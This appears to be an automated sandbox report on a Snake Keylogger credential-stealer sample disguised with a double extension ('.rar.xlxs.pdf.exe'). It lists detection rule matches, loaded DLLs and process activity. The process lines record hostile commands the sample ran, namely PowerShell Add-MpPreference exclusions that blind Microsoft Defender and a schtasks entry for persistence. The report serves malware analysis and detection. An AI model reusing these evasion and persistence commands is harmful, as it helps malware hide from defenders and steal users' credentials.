Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SOFcFE.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: _0020.SetAccessControl
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: _0020.AddAccessRule
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: _0020.SetAccessControl
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@5/5
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File created: C:\Users\user\AppData\Roaming\SOFcFE.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp Jump to behavior
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmp, SOFcFE.exe.1.dr Binary or memory string: select * from [card] where [card].id = (select employees.[card] from employees where employees.id =quse employees; select [name] from department where id =
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003029000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003035000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003003000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Virustotal: Detection: 27%
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File read: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe C:\Users\user\AppData\Roaming\SOFcFE.exe
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
